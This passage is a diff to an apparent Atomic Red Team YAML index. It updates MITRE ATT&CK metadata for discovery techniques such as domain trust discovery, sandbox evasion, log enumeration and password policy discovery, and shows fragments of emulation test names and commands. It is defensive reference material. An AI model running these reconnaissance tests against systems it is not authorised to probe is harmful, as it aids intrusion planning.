         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -85201,7 +85891,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests:
     - name: Windows - Discover domain trusts with dsquery
@@ -85470,7 +86159,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests:
     - name: File and Directory Discovery (cmd.exe)
@@ -85624,7 +86312,7 @@ discovery:
         elevation_required: false
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -85701,7 +86389,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests:
     - name: System Network Connections Discovery
@@ -85775,35 +86462,7 @@ discovery:
           #{SharpView} $syntax -}
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -85815,6 +86474,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -85825,8 +86488,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -85836,9 +86505,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -85871,7 +86559,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -85889,12 +86577,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -85902,11 +86589,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -85917,7 +86607,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -85931,6 +86621,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -85950,7 +86644,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests:
     - name: Get-EventLog To Enumerate Windows Security Log
@@ -85986,51 +86679,7 @@ discovery:
         name: command_prompt
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -86052,19 +86701,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -86135,7 +86826,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests:
     - name: Process Discovery - tasklist
@@ -86279,41 +86969,7 @@ discovery:
         elevation_required: false
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -86337,6 +86993,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -86347,9 +87006,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -86359,12 +87023,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1069.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:14:42.184Z'
       name: 'Permission Groups Discovery: Local Groups'
       description: |-
         Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -86407,7 +87098,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1069.001
     atomic_tests:
     - name: Basic Permission Groups Discovery Windows (Local)
@@ -86505,7 +87195,7 @@ discovery:
         name: powershell
   T1201:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:02:44.477Z'
       name: Password Policy Discovery
       description: |-
         Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -86516,28 +87206,31 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Regina Elwell
+      - Sudhanshu Chauhan, @Sudhanshu_C
+      - Isif Ibrahima, Mandiant
+      - Austin Clark, @c2defense
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor logs and processes for tools and command line arguments
         that may indicate they're being used for password policy discovery. Correlate
         that activity with other suspicious activity from the originating system to
         reduce potential false positives from valid user or administrator activity.
         Adversaries will likely attempt to find the password policy early in an operation
         and the activity is likely to happen with other Discovery activity.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - IaaS
       - Network
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.5'
-      x_mitre_contributors:
-      - Regina Elwell
-      - Sudhanshu Chauhan, @Sudhanshu_C
-      - Isif Ibrahima, Mandiant
-      - Austin Clark, @c2defense
+      - Identity Provider
+      - SaaS
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Metadata'
       - 'Command: Command Execution'
@@ -86570,9 +87263,8 @@ discovery:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1201
     atomic_tests:
     - name: Examine local password policy - Windows
@@ -86681,7 +87373,7 @@ discovery:
         description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
           the Doppelgänging technique. Retrieved May 22, 2018.
         url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:00:56.174Z'
       name: 'System Location Discovery: System Language Discovery'
       description: "Adversaries may attempt to gather information about the system
         language of a victim in order to infer the geographical location of that host.
@@ -86720,8 +87412,6 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1614.001
     atomic_tests:
     - name: Discover System Language by Registry Query
@@ -86793,7 +87483,7 @@ discovery:
         command: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
   T1012:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-03T18:56:37.011Z'
       name: Query Registry
       description: |-
         Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
@@ -86834,7 +87524,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1012
     atomic_tests:
     - name: Query Registry
@@ -86983,82 +87672,81 @@ discovery:
           '
   T1614:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      - macOS
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:07:23.511Z'
+      name: System Location Discovery
+      description: |2-
+
+        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+        Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+        Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Pooja Natarajan, NEC Corporation India
       - Hiroki Nagahama, NEC Corporation
       - Manikantan Srinivasan, NEC Corporation India
       - Wes Hurd
       - Katie Nickels, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+        Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling <code> GetLocaleInfoW</code> to gather information.(Citation: FBI Ragnar Locker 2020)
+
+        Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      - IaaS
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Process: OS API Execution'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
       created: '2021-04-01T16:42:08.735Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1614
         url: https://attack.mitre.org/techniques/T1614
-      - source_name: FBI Ragnar Locker 2020
-        url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
-        description: FBI. (2020, November 19). Indicators of Compromise Associated
-          with Ragnar Locker Ransomware. Retrieved April 1, 2021.
-      - source_name: Sophos Geolocation 2016
-        url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
-        description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
-          target you based on where you live. Retrieved April 1, 2021.'
+        external_id: T1614
       - source_name: Bleepingcomputer RAT malware 2020
-        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
         description: Abrams, L. (2020, October 23). New RAT malware gets commands
           via Discord, has ransomware feature. Retrieved April 1, 2021.
+        url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
       - source_name: AWS Instance Identity Documents
-        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
         description: Amazon. (n.d.). Instance identity documents. Retrieved April
           2, 2021.
-      - source_name: Microsoft Azure Instance Metadata 2021
-        url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
-        description: Microsoft. (2021, February 21). Azure Instance Metadata Service
-          (Windows). Retrieved April 2, 2021.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
       - source_name: Securelist Trasparent Tribe 2020
-        url: https://securelist.com/transparent-tribe-part-1/98127/
         description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
           part 1. Retrieved April 1, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: System Location Discovery
-      description: |2-
-
-        Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
